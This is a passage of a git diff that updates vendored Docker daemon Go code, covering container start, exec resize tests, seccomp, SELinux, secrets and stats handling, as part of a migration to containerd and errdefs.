+func TestExecResize(t *testing.T) {
+	n := "TestExecResize"
+	width := 24
+	height := 8
+	ec := &exec.Config{
+		ID:          n,
+		ContainerID: n,
+		Started:     make(chan struct{}),
+	}
+	close(ec.Started)
+	mc := &execResizeMockContainerdClient{}
+	d := &Daemon{
+		execCommands: exec.NewStore(),
+		containerd:   mc,
+		containers:   container.NewMemoryStore(),
+	}
+	c := &container.Container{
+		ExecCommands: exec.NewStore(),
+		State:        &container.State{Running: true},
+	}
+	d.containers.Add(n, c)
+	d.registerExecCommand(c, ec)
+	err := d.ContainerExecResize(n, height, width)
+	assert.NilError(t, err)
+	assert.Equal(t, mc.Width, width)
+	assert.Equal(t, mc.Height, height)
+	assert.Equal(t, mc.ProcessID, n)
+	assert.Equal(t, mc.ContainerID, n)
+}
+
+// This test is to make sure that when exec context is not ready, a timeout error should happen.
+// TODO: the expect running time for this test is 10s, which would be too long for unit test.
+func TestExecResizeTimeout(t *testing.T) {
+	n := "TestExecResize"
+	width := 24
+	height := 8
+	ec := &exec.Config{
+		ID:          n,
+		ContainerID: n,
+		Started:     make(chan struct{}),
+	}
+	mc := &execResizeMockContainerdClient{}
+	d := &Daemon{
+		execCommands: exec.NewStore(),
+		containerd:   mc,
+		containers:   container.NewMemoryStore(),
+	}
+	c := &container.Container{
+		ExecCommands: exec.NewStore(),
+		State:        &container.State{Running: true},
+	}
+	d.containers.Add(n, c)
+	d.registerExecCommand(c, ec)
+	err := d.ContainerExecResize(n, height, width)
+	assert.ErrorContains(t, err, "timeout waiting for exec session ready")
+}
diff --git a/vendor/github.com/docker/docker/daemon/restart.go b/vendor/github.com/docker/docker/daemon/restart.go
index 79292f3752..0f06dea267 100644
--- a/vendor/github.com/docker/docker/daemon/restart.go
+++ b/vendor/github.com/docker/docker/daemon/restart.go
@@ -1,10 +1,10 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"fmt"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/container"
+	"github.com/sirupsen/logrus"
 )
 
 // ContainerRestart stops and starts a container. It attempts to
@@ -52,7 +52,7 @@ func (daemon *Daemon) containerRestart(container *container.Container, seconds i
 		container.HostConfig.AutoRemove = autoRemove
 		// containerStop will write HostConfig to disk, we shall restore AutoRemove
 		// in disk too
-		if toDiskErr := container.ToDiskLocking(); toDiskErr != nil {
+		if toDiskErr := daemon.checkpointAndSave(container); toDiskErr != nil {
 			logrus.Errorf("Write container to disk error: %v", toDiskErr)
 		}
 
diff --git a/vendor/github.com/docker/docker/daemon/seccomp_disabled.go b/vendor/github.com/docker/docker/daemon/seccomp_disabled.go
index ff1127b6c2..3855c7830e 100644
--- a/vendor/github.com/docker/docker/daemon/seccomp_disabled.go
+++ b/vendor/github.com/docker/docker/daemon/seccomp_disabled.go
@@ -1,6 +1,6 @@
 // +build linux,!seccomp
 
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"fmt"
diff --git a/vendor/github.com/docker/docker/daemon/seccomp_linux.go b/vendor/github.com/docker/docker/daemon/seccomp_linux.go
index 7f16733d95..66ab8c768c 100644
--- a/vendor/github.com/docker/docker/daemon/seccomp_linux.go
+++ b/vendor/github.com/docker/docker/daemon/seccomp_linux.go
@@ -1,20 +1,20 @@
 // +build linux,seccomp
 
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"fmt"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/container"
 	"github.com/docker/docker/profiles/seccomp"
 	"github.com/opencontainers/runtime-spec/specs-go"
+	"github.com/sirupsen/logrus"
 )
 
 var supportsSeccomp = true
 
 func setSeccomp(daemon *Daemon, rs *specs.Spec, c *container.Container) error {
-	var profile *specs.Seccomp
+	var profile *specs.LinuxSeccomp
 	var err error
 
 	if c.HostConfig.Privileged {
diff --git a/vendor/github.com/docker/docker/daemon/seccomp_unsupported.go b/vendor/github.com/docker/docker/daemon/seccomp_unsupported.go
index b3691e96af..a323fe0be1 100644
--- a/vendor/github.com/docker/docker/daemon/seccomp_unsupported.go
+++ b/vendor/github.com/docker/docker/daemon/seccomp_unsupported.go
@@ -1,5 +1,5 @@
 // +build !linux
 
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 var supportsSeccomp = false
diff --git a/vendor/github.com/docker/docker/daemon/secrets.go b/vendor/github.com/docker/docker/daemon/secrets.go
index 355cb1e139..6d368a9fd7 100644
--- a/vendor/github.com/docker/docker/daemon/secrets.go
+++ b/vendor/github.com/docker/docker/daemon/secrets.go
@@ -1,23 +1,10 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
-	"github.com/Sirupsen/logrus"
 	swarmtypes "github.com/docker/docker/api/types/swarm"
-	"github.com/docker/swarmkit/agent/exec"
+	"github.com/sirupsen/logrus"
 )
 
-// SetContainerSecretStore sets the secret store backend for the container
-func (daemon *Daemon) SetContainerSecretStore(name string, store exec.SecretGetter) error {
-	c, err := daemon.GetContainer(name)
-	if err != nil {
-		return err
-	}
-
-	c.SecretStore = store
-
-	return nil
-}
-
 // SetContainerSecretReferences sets the container secret references needed
 func (daemon *Daemon) SetContainerSecretReferences(name string, refs []*swarmtypes.SecretReference) error {
 	if !secretsSupported() && len(refs) > 0 {
diff --git a/vendor/github.com/docker/docker/daemon/secrets_linux.go b/vendor/github.com/docker/docker/daemon/secrets_linux.go
index fca4e12598..2be70be31c 100644
--- a/vendor/github.com/docker/docker/daemon/secrets_linux.go
+++ b/vendor/github.com/docker/docker/daemon/secrets_linux.go
@@ -1,6 +1,4 @@
-// +build linux
-
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 func secretsSupported() bool {
 	return true
diff --git a/vendor/github.com/docker/docker/daemon/secrets_unsupported.go b/vendor/github.com/docker/docker/daemon/secrets_unsupported.go
index d6f36fda1e..edad69c569 100644
--- a/vendor/github.com/docker/docker/daemon/secrets_unsupported.go
+++ b/vendor/github.com/docker/docker/daemon/secrets_unsupported.go
@@ -1,6 +1,6 @@
-// +build !linux
+// +build !linux,!windows
 
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 func secretsSupported() bool {
 	return false
diff --git a/vendor/github.com/docker/docker/daemon/secrets_windows.go b/vendor/github.com/docker/docker/daemon/secrets_windows.go
new file mode 100644
index 0000000000..2be70be31c
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/secrets_windows.go
@@ -0,0 +1,5 @@
+package daemon // import "github.com/docker/docker/daemon"
+
+func secretsSupported() bool {
+	return true
+}
diff --git a/vendor/github.com/docker/docker/daemon/selinux_linux.go b/vendor/github.com/docker/docker/daemon/selinux_linux.go
index 83a3447111..f87b30b738 100644
--- a/vendor/github.com/docker/docker/daemon/selinux_linux.go
+++ b/vendor/github.com/docker/docker/daemon/selinux_linux.go
@@ -1,17 +1,15 @@
-// +build linux
+package daemon // import "github.com/docker/docker/daemon"
 
-package daemon
-
-import "github.com/opencontainers/runc/libcontainer/selinux"
+import "github.com/opencontainers/selinux/go-selinux"
 
 func selinuxSetDisabled() {
 	selinux.SetDisabled()
 }
 
 func selinuxFreeLxcContexts(label string) {
-	selinux.FreeLxcContexts(label)
+	selinux.ReleaseLabel(label)
 }
 
 func selinuxEnabled() bool {
-	return selinux.SelinuxEnabled()
+	return selinux.GetEnabled()
 }
diff --git a/vendor/github.com/docker/docker/daemon/selinux_unsupported.go b/vendor/github.com/docker/docker/daemon/selinux_unsupported.go
index 25a56ad157..49d0d13bce 100644
--- a/vendor/github.com/docker/docker/daemon/selinux_unsupported.go
+++ b/vendor/github.com/docker/docker/daemon/selinux_unsupported.go
@@ -1,6 +1,6 @@
 // +build !linux
 
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 func selinuxSetDisabled() {
 }
diff --git a/vendor/github.com/docker/docker/daemon/start.go b/vendor/github.com/docker/docker/daemon/start.go
index 6c94fd5482..c00bd9ceb2 100644
--- a/vendor/github.com/docker/docker/daemon/start.go
+++ b/vendor/github.com/docker/docker/daemon/start.go
@@ -1,27 +1,23 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
-	"fmt"
-	"net/http"
+	"context"
 	"runtime"
-	"strings"
-	"syscall"
 	"time"
 
-	"google.golang.org/grpc"
-
-	"github.com/Sirupsen/logrus"
-	apierrors "github.com/docker/docker/api/errors"
 	"github.com/docker/docker/api/types"
 	containertypes "github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/container"
-	"github.com/docker/docker/runconfig"
+	"github.com/docker/docker/errdefs"
+	"github.com/docker/docker/pkg/mount"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
 // ContainerStart starts a container.
 func (daemon *Daemon) ContainerStart(name string, hostConfig *containertypes.HostConfig, checkpoint string, checkpointDir string) error {
 	if checkpoint != "" && !daemon.HasExperimental() {
-		return apierrors.NewBadRequestError(fmt.Errorf("checkpoint is only supported in experimental mode"))
+		return errdefs.InvalidParameter(errors.New("checkpoint is only supported in experimental mode"))
 	}
 
 	container, err := daemon.GetContainer(name)
@@ -29,13 +25,26 @@ func (daemon *Daemon) ContainerStart(name string, hostConfig *containertypes.Hos
 		return err
 	}
 
-	if container.IsPaused() {
-		return fmt.Errorf("Cannot start a paused container, try unpause instead.")
+	validateState := func() error {
+		container.Lock()
+		defer container.Unlock()
+
+		if container.Paused {
+			return errdefs.Conflict(errors.New("cannot start a paused container, try unpause instead"))
+		}
+
+		if container.Running {
+			return containerNotModifiedError{running: true}
+		}
+
+		if container.RemovalInProgress || container.Dead {
+			return errdefs.Conflict(errors.New("container is marked for removal and cannot be started"))
+		}
+		return nil
 	}
 
-	if container.IsRunning() {
-		err := fmt.Errorf("Container already started")
-		return apierrors.NewErrorWithStatusCode(err, http.StatusNotModified)
+	if err := validateState(); err != nil {
+		return err
 	}
 
 	// Windows does not have the backwards compatibility issue here.
@@ -46,52 +55,46 @@ func (daemon *Daemon) ContainerStart(name string, hostConfig *containertypes.Hos
 			logrus.Warn("DEPRECATED: Setting host configuration options when the container starts is deprecated and has been removed in Docker 1.12")
 			oldNetworkMode := container.HostConfig.NetworkMode
 			if err := daemon.setSecurityOptions(container, hostConfig); err != nil {
-				return err
+				return errdefs.InvalidParameter(err)
 			}
 			if err := daemon.mergeAndVerifyLogConfig(&hostConfig.LogConfig); err != nil {
-				return err
+				return errdefs.InvalidParameter(err)
 			}
 			if err := daemon.setHostConfig(container, hostConfig); err != nil {
-				return err
+				return errdefs.InvalidParameter(err)
 			}
 			newNetworkMode := container.HostConfig.NetworkMode
 			if string(oldNetworkMode) != string(newNetworkMode) {
 				// if user has change the network mode on starting, clean up the
 				// old networks. It is a deprecated feature and has been removed in Docker 1.12
 				container.NetworkSettings.Networks = nil
-				if err := container.ToDisk(); err != nil {
-					return err
+				if err := container.CheckpointTo(daemon.containersReplica); err != nil {
+					return errdefs.System(err)
 				}
 			}
 			container.InitDNSHostConfig()
 		}
 	} else {
 		if hostConfig != nil {
-			return fmt.Errorf("Supplying a hostconfig on start is not supported. It should be supplied on create")
+			return errdefs.InvalidParameter(errors.New("Supplying a hostconfig on start is not supported. It should be supplied on create"))
 		}
 	}
 
 	// check if hostConfig is in line with the current system settings.
 	// It may happen cgroups are umounted or the like.
-	if _, err = daemon.verifyContainerSettings(container.HostConfig, nil, false); err != nil {
-		return err
+	if _, err = daemon.verifyContainerSettings(container.OS, container.HostConfig, nil, false); err != nil {
+		return errdefs.InvalidParameter(err)
 	}
 	// Adapt for old containers in case we have updates in this function and
 	// old containers never have chance to call the new function in create stage.
 	if hostConfig != nil {
 		if err := daemon.adaptContainerSettings(container.HostConfig, false); err != nil {
-			return err
+			return errdefs.InvalidParameter(err)
 		}
 	}
-
 	return daemon.containerStart(container, checkpoint, checkpointDir, true)
 }
 
-// Start starts a container
-func (daemon *Daemon) Start(container *container.Container) error {
-	return daemon.containerStart(container, "", "", true)
-}
-
 // containerStart prepares the container to run by setting up everything the
 // container needs, such as storage and networking, as well as links
 // between containers. The container is left waiting for a signal to
@@ -106,7 +109,12 @@ func (daemon *Daemon) containerStart(container *container.Container, checkpoint
 	}
 
 	if container.RemovalInProgress || container.Dead {
-		return fmt.Errorf("Container is marked for removal and cannot be started.")
+		return errdefs.Conflict(errors.New("container is marked for removal and cannot be started"))
+	}
+
+	if checkpointDir != "" {
+		// TODO(mlaventure): how would we support that?
+		return errdefs.Forbidden(errors.New("custom checkpointdir is not supported"))
 	}
 
 	// if we encounter an error during start we need to ensure that any other
@@ -118,8 +126,9 @@ func (daemon *Daemon) containerStart(container *container.Container, checkpoint
 			if container.ExitCode() == 0 {
 				container.SetExitCode(128)
 			}
-			container.ToDisk()
-
+			if err := container.CheckpointTo(daemon.containersReplica); err != nil {
+				logrus.Errorf("%s: failed saving state on start failure: %v", container.ID, err)
+			}
 			container.Reset(false)
 
 			daemon.Cleanup(container)
@@ -138,61 +147,65 @@ func (daemon *Daemon) containerStart(container *container.Container, checkpoint
 		return err
 	}
 
-	// Make sure NetworkMode has an acceptable value. We do this to ensure
-	// backwards API compatibility.
-	container.HostConfig = runconfig.SetDefaultNetModeIfBlank(container.HostConfig)
-
 	if err := daemon.initializeNetworking(container); err != nil {
 		return err
 	}
 
 	spec, err := daemon.createSpec(container)
 	if err != nil {
+		return errdefs.System(err)
+	}
+
+	if resetRestartManager {
+		container.ResetRestartManager(true)
+	}
+
+	if daemon.saveApparmorConfig(container); err != nil {
 		return err
 	}
 
+	if checkpoint != "" {
+		checkpointDir, err = getCheckpointDir(checkpointDir, checkpoint, container.Name, container.ID, container.CheckpointDir(), false)
+		if err != nil {
+			return err
+		}
+	}
+
 	createOptions, err := daemon.getLibcontainerdCreateOptions(container)
 	if err != nil {
 		return err
 	}
 
-	if resetRestartManager {
-		container.ResetRestartManager(true)
+	err = daemon.containerd.Create(context.Background(), container.ID, spec, createOptions)
+	if err != nil {
+		return translateContainerdStartErr(container.Path, container.SetExitCode, err)
 	}
 
-	if checkpointDir == "" {
-		checkpointDir = container.CheckpointDir()
+	// TODO(mlaventure): we need to specify checkpoint options here
+	pid, err := daemon.containerd.Start(context.Background(), container.ID, checkpointDir,
+		container.StreamConfig.Stdin() != nil || container.Config.Tty,
+		container.InitializeStdio)
+	if err != nil {
+		if err := daemon.containerd.Delete(context.Background(), container.ID); err != nil {
+			logrus.WithError(err).WithField("container", container.ID).
+				Error("failed to delete failed start container")
+		}
+		return translateContainerdStartErr(container.Path, container.SetExitCode, err)
 	}
 
-	if err := daemon.containerd.Create(container.ID, checkpoint, checkpointDir, *spec, container.InitializeStdio, createOptions...); err != nil {
-		errDesc := grpc.ErrorDesc(err)
-		contains := func(s1, s2 string) bool {
-			return strings.Contains(strings.ToLower(s1), s2)
-		}
-		logrus.Errorf("Create container failed with error: %s", errDesc)
-		// if we receive an internal error from the initial start of a container then lets
-		// return it instead of entering the restart loop
-		// set to 127 for container cmd not found/does not exist)
-		if contains(errDesc, container.Path) &&
-			(contains(errDesc, "executable file not found") ||
-				contains(errDesc, "no such file or directory") ||
-				contains(errDesc, "system cannot find the file specified")) {
-			container.SetExitCode(127)
-		}
-		// set to 126 for container cmd can't be invoked errors
-		if contains(errDesc, syscall.EACCES.Error()) {
-			container.SetExitCode(126)
-		}
+	container.SetRunning(pid, true)
+	container.HasBeenManuallyStopped = false
+	container.HasBeenStartedBefore = true
+	daemon.setStateCounter(container)
 
-		// attempted to mount a file onto a directory, or a directory onto a file, maybe from user specified bind mounts
-		if contains(errDesc, syscall.ENOTDIR.Error()) {
-			errDesc += ": Are you trying to mount a directory onto a file (or vice-versa)? Check if the specified host path exists and is the expected type"
-			container.SetExitCode(127)
-		}
+	daemon.initHealthMonitor(container)
 
-		return fmt.Errorf("%s", errDesc)
+	if err := container.CheckpointTo(daemon.containersReplica); err != nil {
+		logrus.WithError(err).WithField("container", container.ID).
+			Errorf("failed to store container")
 	}
 
+	daemon.LogContainerEvent(container, "start")
 	containerActions.WithValues("start").UpdateSince(start)
 
 	return nil
@@ -203,12 +216,14 @@ func (daemon *Daemon) containerStart(container *container.Container, checkpoint
 func (daemon *Daemon) Cleanup(container *container.Container) {
 	daemon.releaseNetwork(container)
 
-	container.UnmountIpcMounts(detachMounted)
+	if err := container.UnmountIpcMount(detachMounted); err != nil {
+		logrus.Warnf("%s cleanup: failed to unmount IPC: %s", container.ID, err)
+	}
 
 	if err := daemon.conditionalUnmountOnCleanup(container); err != nil {
 		// FIXME: remove once reference counting for graphdrivers has been refactored
 		// Ensure that all the mounts are gone
-		if mountid, err := daemon.layerStore.GetMountID(container.ID); err == nil {
+		if mountid, err := daemon.imageService.GetLayerMountID(container.ID, container.OS); err == nil {
 			daemon.cleanupMountsByID(mountid)
 		}
 	}
@@ -217,14 +232,23 @@ func (daemon *Daemon) Cleanup(container *container.Container) {
 		logrus.Warnf("%s cleanup: failed to unmount secrets: %s", container.ID, err)
 	}
 
+	if err := mount.RecursiveUnmount(container.Root); err != nil {
+		logrus.WithError(err).WithField("container", container.ID).Warn("Error while cleaning up container resource mounts.")
+	}
+
 	for _, eConfig := range container.ExecCommands.Commands() {
 		daemon.unregisterExecCommand(container, eConfig)
 	}
 
-	if container.BaseFS != "" {
+	if container.BaseFS != nil && container.BaseFS.Path() != "" {
 		if err := container.UnmountVolumes(daemon.LogVolumeEvent); err != nil {
 			logrus.Warnf("%s cleanup: Failed to umount volumes: %v", container.ID, err)
 		}
 	}
+
 	container.CancelAttachContext()
+
+	if err := daemon.containerd.Delete(context.Background(), container.ID); err != nil {
+		logrus.Errorf("%s cleanup: failed to delete container from containerd: %v", container.ID, err)
+	}
 }
diff --git a/vendor/github.com/docker/docker/daemon/start_unix.go b/vendor/github.com/docker/docker/daemon/start_unix.go
index 6bbe485075..e680b95f42 100644
--- a/vendor/github.com/docker/docker/daemon/start_unix.go
+++ b/vendor/github.com/docker/docker/daemon/start_unix.go
@@ -1,31 +1,57 @@
 // +build !windows
 
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"fmt"
+	"os/exec"
+	"path/filepath"
 
+	"github.com/containerd/containerd/runtime/linux/runctypes"
 	"github.com/docker/docker/container"
-	"github.com/docker/docker/libcontainerd"
+	"github.com/docker/docker/errdefs"
+	"github.com/pkg/errors"
 )
 
-func (daemon *Daemon) getLibcontainerdCreateOptions(container *container.Container) ([]libcontainerd.CreateOption, error) {
-	createOptions := []libcontainerd.CreateOption{}
+func (daemon *Daemon) getRuntimeScript(container *container.Container) (string, error) {
+	name := container.HostConfig.Runtime
+	rt := daemon.configStore.GetRuntime(name)
+	if rt == nil {
+		return "", errdefs.InvalidParameter(errors.Errorf("no such runtime '%s'", name))
+	}
+
+	if len(rt.Args) > 0 {
+		// First check that the target exist, as using it in a script won't
+		// give us the right error
+		if _, err := exec.LookPath(rt.Path); err != nil {
+			return "", translateContainerdStartErr(container.Path, container.SetExitCode, err)
+		}
+		return filepath.Join(daemon.configStore.Root, "runtimes", name), nil
+	}
+	return rt.Path, nil
+}
 
+// getLibcontainerdCreateOptions callers must hold a lock on the container
+func (daemon *Daemon) getLibcontainerdCreateOptions(container *container.Container) (interface{}, error) {
 	// Ensure a runtime has been assigned to this container
 	if container.HostConfig.Runtime == "" {
-		container.HostConfig.Runtime = stockRuntimeName
-		container.ToDisk()
+		container.HostConfig.Runtime = daemon.configStore.GetDefaultRuntimeName()
+		container.CheckpointTo(daemon.containersReplica)
 	}
 
-	rt := daemon.configStore.GetRuntime(container.HostConfig.Runtime)
-	if rt == nil {
-		return nil, fmt.Errorf("no such runtime '%s'", container.HostConfig.Runtime)
+	path, err := daemon.getRuntimeScript(container)
+	if err != nil {
+		return nil, err
 	}
+	opts := &runctypes.RuncOptions{
+		Runtime: path,
+		RuntimeRoot: filepath.Join(daemon.configStore.ExecRoot,
+			fmt.Sprintf("runtime-%s", container.HostConfig.Runtime)),
+	}
+
 	if UsingSystemd(daemon.configStore) {
-		rt.Args = append(rt.Args, "--systemd-cgroup=true")
+		opts.SystemdCgroup = true
 	}
-	createOptions = append(createOptions, libcontainerd.WithRuntime(rt.Path, rt.Args))
 
-	return createOptions, nil
+	return opts, nil
 }
diff --git a/vendor/github.com/docker/docker/daemon/start_windows.go b/vendor/github.com/docker/docker/daemon/start_windows.go
index faa7575224..f4606f7a60 100644
--- a/vendor/github.com/docker/docker/daemon/start_windows.go
+++ b/vendor/github.com/docker/docker/daemon/start_windows.go
@@ -1,205 +1,38 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
-	"fmt"
-	"io/ioutil"
-	"path/filepath"
-	"strings"
-
+	"github.com/Microsoft/opengcs/client"
 	"github.com/docker/docker/container"
-	"github.com/docker/docker/layer"
-	"github.com/docker/docker/libcontainerd"
-	"golang.org/x/sys/windows/registry"
-)
-
-const (
-	credentialSpecRegistryLocation = `SOFTWARE\Microsoft\Windows NT\CurrentVersion\Virtualization\Containers\CredentialSpecs`
-	credentialSpecFileLocation     = "CredentialSpecs"
 )
 
-func (daemon *Daemon) getLibcontainerdCreateOptions(container *container.Container) ([]libcontainerd.CreateOption, error) {
-	createOptions := []libcontainerd.CreateOption{}
-
-	// Are we going to run as a Hyper-V container?
-	hvOpts := &libcontainerd.HyperVIsolationOption{}
-	if container.HostConfig.Isolation.IsDefault() {
-		// Container is set to use the default, so take the default from the daemon configuration
-		hvOpts.IsHyperV = daemon.defaultIsolation.IsHyperV()
-	} else {
-		// Container is requesting an isolation mode. Honour it.
-		hvOpts.IsHyperV = container.HostConfig.Isolation.IsHyperV()
-	}
-
-	// Generate the layer folder of the layer options
-	layerOpts := &libcontainerd.LayerOption{}
-	m, err := container.RWLayer.Metadata()
-	if err != nil {
-		return nil, fmt.Errorf("failed to get layer metadata - %s", err)
-	}
-	if hvOpts.IsHyperV {
-		hvOpts.SandboxPath = filepath.Dir(m["dir"])
-	}
-
-	layerOpts.LayerFolderPath = m["dir"]
-
-	// Generate the layer paths of the layer options
-	img, err := daemon.imageStore.Get(container.ImageID)
-	if err != nil {
-		return nil, fmt.Errorf("failed to graph.Get on ImageID %s - %s", container.ImageID, err)
-	}
-	// Get the layer path for each layer.
-	max := len(img.RootFS.DiffIDs)
-	for i := 1; i <= max; i++ {
-		img.RootFS.DiffIDs = img.RootFS.DiffIDs[:i]
-		layerPath, err := layer.GetLayerPath(daemon.layerStore, img.RootFS.ChainID())
-		if err != nil {
-			return nil, fmt.Errorf("failed to get layer path from graphdriver %s for ImageID %s - %s", daemon.layerStore, img.RootFS.ChainID(), err)
+func (daemon *Daemon) getLibcontainerdCreateOptions(container *container.Container) (interface{}, error) {
+	// LCOW options.
+	if container.OS == "linux" {
+		config := &client.Config{}
+		if err := config.GenerateDefault(daemon.configStore.GraphOptions); err != nil {
+			return nil, err
 		}
-		// Reverse order, expecting parent most first
-		layerOpts.LayerPaths = append([]string{layerPath}, layerOpts.LayerPaths...)
-	}
-
-	// Get endpoints for the libnetwork allocated networks to the container
-	var epList []string
-	AllowUnqualifiedDNSQuery := false
-	gwHNSID := ""
-	if container.NetworkSettings != nil {
-		for n := range container.NetworkSettings.Networks {
-			sn, err := daemon.FindNetwork(n)
-			if err != nil {
-				continue
-			}
-
-			ep, err := container.GetEndpointInNetwork(sn)
-			if err != nil {
-				continue
-			}
-
-			data, err := ep.DriverInfo()
-			if err != nil {
-				continue
-			}
-
-			if data["GW_INFO"] != nil {
-				gwInfo := data["GW_INFO"].(map[string]interface{})
-				if gwInfo["hnsid"] != nil {
-					gwHNSID = gwInfo["hnsid"].(string)
-				}
-			}
-
-			if data["hnsid"] != nil {
-				epList = append(epList, data["hnsid"].(string))
-			}
-
-			if data["AllowUnqualifiedDNSQuery"] != nil {
-				AllowUnqualifiedDNSQuery = true
+		// Override from user-supplied options.
+		for k, v := range container.HostConfig.StorageOpt {
+			switch k {
+			case "lcow.kirdpath":
+				config.KirdPath = v
+			case "lcow.kernel":
+				config.KernelFile = v
+			case "lcow.initrd":
+				config.InitrdFile = v
+			case "lcow.vhdx":
+				config.Vhdx = v
+			case "lcow.bootparameters":
+				config.BootParameters = v
 			}
 		}
-	}
-
-	if gwHNSID != "" {
-		epList = append(epList, gwHNSID)
-	}
-
-	// Read and add credentials from the security options if a credential spec has been provided.
-	if container.HostConfig.SecurityOpt != nil {
-		for _, sOpt := range container.HostConfig.SecurityOpt {
-			sOpt = strings.ToLower(sOpt)
-			if !strings.Contains(sOpt, "=") {
-				return nil, fmt.Errorf("invalid security option: no equals sign in supplied value %s", sOpt)
-			}
-			var splitsOpt []string
-			splitsOpt = strings.SplitN(sOpt, "=", 2)
-			if len(splitsOpt) != 2 {
-				return nil, fmt.Errorf("invalid security option: %s", sOpt)
-			}
-			if splitsOpt[0] != "credentialspec" {
-				return nil, fmt.Errorf("security option not supported: %s", splitsOpt[0])
-			}
-
-			credentialsOpts := &libcontainerd.CredentialsOption{}
-			var (
-				match   bool
-				csValue string
-				err     error
-			)
-			if match, csValue = getCredentialSpec("file://", splitsOpt[1]); match {
-				if csValue == "" {
-					return nil, fmt.Errorf("no value supplied for file:// credential spec security option")
-				}
-				if credentialsOpts.Credentials, err = readCredentialSpecFile(container.ID, daemon.root, filepath.Clean(csValue)); err != nil {
-					return nil, err
-				}
-			} else if match, csValue = getCredentialSpec("registry://", splitsOpt[1]); match {
-				if csValue == "" {
-					return nil, fmt.Errorf("no value supplied for registry:// credential spec security option")
-				}
-				if credentialsOpts.Credentials, err = readCredentialSpecRegistry(container.ID, csValue); err != nil {
-					return nil, err
-				}
-			} else {
-				return nil, fmt.Errorf("invalid credential spec security option - value must be prefixed file:// or registry:// followed by a value")
-			}
-			createOptions = append(createOptions, credentialsOpts)
+		if err := config.Validate(); err != nil {
+			return nil, err
 		}
-	}
 
-	// Now add the remaining options.
-	createOptions = append(createOptions, &libcontainerd.FlushOption{IgnoreFlushesDuringBoot: !container.HasBeenStartedBefore})
-	createOptions = append(createOptions, hvOpts)
-	createOptions = append(createOptions, layerOpts)
-	if epList != nil {
-		createOptions = append(createOptions, &libcontainerd.NetworkEndpointsOption{Endpoints: epList, AllowUnqualifiedDNSQuery: AllowUnqualifiedDNSQuery})
+		return config, nil
 	}
 
-	return createOptions, nil
-}
-
-// getCredentialSpec is a helper function to get the value of a credential spec supplied
-// on the CLI, stripping the prefix
-func getCredentialSpec(prefix, value string) (bool, string) {
-	if strings.HasPrefix(value, prefix) {
-		return true, strings.TrimPrefix(value, prefix)
-	}
-	return false, ""
-}
-
-// readCredentialSpecRegistry is a helper function to read a credential spec from
-// the registry. If not found, we return an empty string and warn in the log.
-// This allows for staging on machines which do not have the necessary components.
-func readCredentialSpecRegistry(id, name string) (string, error) {
-	var (
-		k   registry.Key
-		err error
-		val string
-	)
-	if k, err = registry.OpenKey(registry.LOCAL_MACHINE, credentialSpecRegistryLocation, registry.QUERY_VALUE); err != nil {
-		return "", fmt.Errorf("failed handling spec %q for container %s - %s could not be opened", name, id, credentialSpecRegistryLocation)
-	}
-	if val, _, err = k.GetStringValue(name); err != nil {
-		if err == registry.ErrNotExist {
-			return "", fmt.Errorf("credential spec %q for container %s as it was not found", name, id)
-		}
-		return "", fmt.Errorf("error %v reading credential spec %q from registry for container %s", err, name, id)
-	}
-	return val, nil
-}
-
-// readCredentialSpecFile is a helper function to read a credential spec from
-// a file. If not found, we return an empty string and warn in the log.
-// This allows for staging on machines which do not have the necessary components.
-func readCredentialSpecFile(id, root, location string) (string, error) {
-	if filepath.IsAbs(location) {
-		return "", fmt.Errorf("invalid credential spec - file:// path cannot be absolute")
-	}
-	base := filepath.Join(root, credentialSpecFileLocation)
-	full := filepath.Join(base, location)
-	if !strings.HasPrefix(full, base) {
-		return "", fmt.Errorf("invalid credential spec - file:// path must be under %s", base)
-	}
-	bcontents, err := ioutil.ReadFile(full)
-	if err != nil {
-		return "", fmt.Errorf("credential spec '%s' for container %s as the file could not be read: %q", full, id, err)
-	}
-	return string(bcontents[:]), nil
+	return nil, nil
 }
diff --git a/vendor/github.com/docker/docker/daemon/stats.go b/vendor/github.com/docker/docker/daemon/stats.go
index 51f5962d17..eb23e272ae 100644
--- a/vendor/github.com/docker/docker/daemon/stats.go
+++ b/vendor/github.com/docker/docker/daemon/stats.go
@@ -1,14 +1,12 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
+	"context"
 	"encoding/json"
 	"errors"
-	"fmt"
 	"runtime"
 	"time"
 
-	"golang.org/x/net/context"
-
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/backend"
 	"github.com/docker/docker/api/types/versions"
@@ -20,9 +18,6 @@ import (
 // ContainerStats writes information about the container to the stream
 // given in the config object.
 func (daemon *Daemon) ContainerStats(ctx context.Context, prefixOrName string, config *backend.ContainerStatsConfig) error {
-	if runtime.GOOS == "solaris" {
-		return fmt.Errorf("%+v does not support stats", runtime.GOOS)
-	}
 	// Engine API version (used for backwards compatibility)
 	apiVersion := config.Version
 
@@ -33,7 +28,9 @@ func (daemon *Daemon) ContainerStats(ctx context.Context, prefixOrName string, c
 
 	// If the container is either not running or restarting and requires no stream, return an empty stats.
 	if (!container.IsRunning() || container.IsRestarting()) && !config.Stream {
-		return json.NewEncoder(config.OutStream).Encode(&types.Stats{})
+		return json.NewEncoder(config.OutStream).Encode(&types.StatsJSON{
+			Name: container.Name,
+			ID:   container.ID})
 	}
 
 	outStream := config.OutStream
@@ -133,11 +130,11 @@ func (daemon *Daemon) ContainerStats(ctx context.Context, prefixOrName string, c
 }
 
 func (daemon *Daemon) subscribeToContainerStats(c *container.Container) chan interface{} {
-	return daemon.statsCollector.collect(c)
+	return daemon.statsCollector.Collect(c)
 }
 
